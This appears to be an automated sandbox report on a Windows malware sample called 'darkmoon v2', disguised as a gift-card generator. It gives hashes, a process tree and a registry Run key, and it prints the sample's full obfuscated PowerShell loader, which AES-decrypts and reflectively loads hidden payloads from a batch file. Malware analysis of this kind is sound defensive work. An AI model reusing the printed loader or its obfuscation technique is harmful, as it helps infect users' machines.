Analysis
-
max time kernel
120s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
02-06-2024 15:40
Static task
static1
Behavioral task
behavioral1
Sample
darkmoon v2/lib/AyBYMBjlvU.bat
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
darkmoon v2/lib/AyBYMBjlvU.bat
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
darkmoon v2/lib/DarkMoon_Gen.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral4
Sample
darkmoon v2/start.bat
Resource
win7-20240221-en
Behavioral task
behavioral5
Sample
darkmoon v2/start.bat
Resource
win10v2004-20240508-en
General
-
Target
darkmoon v2/start.bat
-
Size
82B
-
MD5
e6ede72374e4f7b8b907d4099c76f4d4
-
SHA1
146899cf959ada383b0a258b06da7963ef0d1c70
-
SHA256
c07fbd6c49d83eb8399435f9972551d2c73a29e5914a25640639191d187dd80d
-
SHA512
1b2d0cd4a5deae331ed16f383831f4ff7ba1c5b7f6906a35354dfd420ca44f17e3469157f2327685a6aa9773175425aa145faa2d4866030d131334eb36426fcc
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
AyBYMBjlvU.bat.exepid process 2380 AyBYMBjlvU.bat.exe -
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid process 2684 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
DarkMoon_Gen.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" DarkMoon_Gen.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 13 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 1888 timeout.exe 2008 timeout.exe 2240 timeout.exe 2364 timeout.exe 1972 timeout.exe 2384 timeout.exe 2308 timeout.exe 1604 timeout.exe 1524 timeout.exe 2776 timeout.exe 2896 timeout.exe 2816 timeout.exe 2272 timeout.exe -
Runs ping.exe 1 TTPs 17 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid process 2660 PING.EXE 2128 PING.EXE 2508 PING.EXE 2408 PING.EXE 2840 PING.EXE 2548 PING.EXE 2872 PING.EXE 868 PING.EXE 2632 PING.EXE 760 PING.EXE 2436 PING.EXE 1132 PING.EXE 2576 PING.EXE 2432 PING.EXE 848 PING.EXE 1964 PING.EXE 1644 PING.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
AyBYMBjlvU.bat.exepid process 2380 AyBYMBjlvU.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
AyBYMBjlvU.bat.exedescription pid process Token: SeDebugPrivilege 2380 AyBYMBjlvU.bat.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exeDarkMoon_Gen.execmd.execmd.exedescription pid process target process PID 2168 wrote to memory of 2476 2168 cmd.exe DarkMoon_Gen.exe PID 2168 wrote to memory of 2476 2168 cmd.exe DarkMoon_Gen.exe PID 2168 wrote to memory of 2476 2168 cmd.exe DarkMoon_Gen.exe PID 2168 wrote to memory of 2684 2168 cmd.exe cmd.exe PID 2168 wrote to memory of 2684 2168 cmd.exe cmd.exe PID 2168 wrote to memory of 2684 2168 cmd.exe cmd.exe PID 2476 wrote to memory of 2164 2476 DarkMoon_Gen.exe cmd.exe PID 2476 wrote to memory of 2164 2476 DarkMoon_Gen.exe cmd.exe PID 2476 wrote to memory of 2164 2476 DarkMoon_Gen.exe cmd.exe PID 2164 wrote to memory of 2932 2164 cmd.exe chcp.com PID 2164 wrote to memory of 2932 2164 cmd.exe chcp.com PID 2164 wrote to memory of 2932 2164 cmd.exe chcp.com PID 2164 wrote to memory of 2896 2164 cmd.exe timeout.exe PID 2164 wrote to memory of 2896 2164 cmd.exe timeout.exe PID 2164 wrote to memory of 2896 2164 cmd.exe timeout.exe PID 2164 wrote to memory of 2660 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 2660 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 2660 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 2548 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 2548 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 2548 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 1132 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 1132 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 1132 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 2576 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 2576 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 2576 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 2128 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 2128 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 2128 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 2432 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 2432 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 2432 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 2872 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 2872 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 2872 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 2508 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 2508 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 2508 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 2408 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 2408 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 2408 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 2364 2164 cmd.exe timeout.exe PID 2164 wrote to memory of 2364 2164 cmd.exe timeout.exe PID 2164 wrote to memory of 2364 2164 cmd.exe timeout.exe PID 2164 wrote to memory of 2840 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 2840 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 2840 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 1972 2164 cmd.exe timeout.exe PID 2164 wrote to memory of 1972 2164 cmd.exe timeout.exe PID 2164 wrote to memory of 1972 2164 cmd.exe timeout.exe PID 2164 wrote to memory of 868 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 868 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 868 2164 cmd.exe PING.EXE PID 2684 wrote to memory of 2380 2684 cmd.exe AyBYMBjlvU.bat.exe PID 2684 wrote to memory of 2380 2684 cmd.exe AyBYMBjlvU.bat.exe PID 2684 wrote to memory of 2380 2684 cmd.exe AyBYMBjlvU.bat.exe PID 2164 wrote to memory of 1888 2164 cmd.exe timeout.exe PID 2164 wrote to memory of 1888 2164 cmd.exe timeout.exe PID 2164 wrote to memory of 1888 2164 cmd.exe timeout.exe PID 2164 wrote to memory of 848 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 848 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 848 2164 cmd.exe PING.EXE PID 2164 wrote to memory of 2384 2164 cmd.exe timeout.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\darkmoon v2\start.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\DarkMoon_Gen.exeDarkMoon_Gen.exe2⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c "Dark Moon gen.bat"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650014⤵
-
C:\Windows\system32\timeout.exetimeout 24⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping localhost -n 14⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 14⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 14⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 14⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 14⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 14⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 14⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 14⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping discord.com4⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 04⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.paysafecard.com4⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 04⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.amazon.com4⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 04⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping play.google.com4⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 04⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping store.steampowered.com4⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 04⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping netflix.com4⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 04⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.spotify.com4⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 04⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.xbox.com4⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 04⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout 24⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout 24⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.google.com4⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 24⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K AyBYMBjlvU.bat2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\AyBYMBjlvU.bat.exe"AyBYMBjlvU.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function PCvVf($yFrQM){ $KryQB=[System.Security.Cryptography.Aes]::Create(); $KryQB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KryQB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KryQB.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWxz9LOIFbVN1/7cN9UWMlncfIJFIhU1cXRWWiP9bXg='); $KryQB.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EIdWPSRydSjZkTvenqbEOg=='); $TSyON=$KryQB.CreateDecryptor(); $return_var=$TSyON.TransformFinalBlock($yFrQM, 0, $yFrQM.Length); $TSyON.Dispose(); $KryQB.Dispose(); $return_var;}function DJYpo($yFrQM){ $rdKbv=New-Object System.IO.MemoryStream(,$yFrQM); $nDivC=New-Object System.IO.MemoryStream; $KhHzB=New-Object System.IO.Compression.GZipStream($rdKbv, [IO.Compression.CompressionMode]::Decompress); $KhHzB.CopyTo($nDivC); $KhHzB.Dispose(); $rdKbv.Dispose(); $nDivC.Dispose(); $nDivC.ToArray();}function mCQbd($yFrQM,$cFYDO){ $nHpHM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$yFrQM); $KnSYu=$nHpHM.EntryPoint; $KnSYu.Invoke($null, $cFYDO);}$PdisG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\AyBYMBjlvU.bat').Split([Environment]::NewLine);foreach ($gyYDO in $PdisG) { if ($gyYDO.StartsWith('SEROXEN')) { $UdMrg=$gyYDO.Substring(7); break; }}$ekLHX=[string[]]$UdMrg.Split('\');$HlrJz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[0])));$ejeLz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[1])));mCQbd $ejeLz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));mCQbd $HlrJz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Dark Moon gen.batFilesize
35KB
MD5c153581143e0b72cecae38a393991a4b
SHA1da43d03b19765594ff124415a060551343823a39
SHA2562fa64c968a0fe02d626a225ecc2e1e4a5185f73d70a0557f32f2bbea76361005
SHA5128c9807f4a3044f49d99e5b1c2a20d112eba61570fa0e725777a3bd84d6a0e7df1c604579863e27c6d0617c2c84fa4ae8c3b7525e37f7e7ee9c6ef26b6c9db40f
-
\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\AyBYMBjlvU.bat.exeFilesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
memory/2380-8-0x000000001B140000-0x000000001B422000-memory.dmpFilesize
2.9MB
-
memory/2380-9-0x0000000001E70000-0x0000000001E78000-memory.dmpFilesize
32KB